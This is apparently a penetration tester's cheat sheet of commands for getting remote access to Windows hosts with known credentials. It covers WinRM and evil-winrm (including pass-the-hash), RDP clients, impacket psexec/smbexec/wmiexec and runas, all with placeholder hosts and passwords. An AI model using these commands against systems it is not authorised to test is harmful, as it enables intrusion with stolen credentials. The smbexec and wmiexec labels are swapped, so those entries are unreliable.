Access
How to get into a system if you have creds
WinRM
Regular
Here are 3 commands:
Converting our password to secure string
Putting password secure string and username into $cred object
Using $cred for authentication
PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $credEvil-WinRM
evil-winrm -i 13.13.13.13 -u venator17 -p S3cr3t!
evil-winrm -i 13.13.13.13 -u 'administrator' -H 'blahblahsupersecretnthash'RDP
Rdesktop
rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13Xfreerdp
Regular
xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignoreWith Port-Forwarding
xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignoreMounting a local dir
xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123Remmina (GUI)
reminnaPSEXEC
impacket-psexec administrator:'password123'@13.13.13.13WMIEXEC
impacket-smbexec sreed:password123@13.13.13.13SMBEXEC
impacket-wmiexec sreed:password123@13.13.13.13RUNAS
runas /netonly /user:MILITECH\sreed powershellLast updated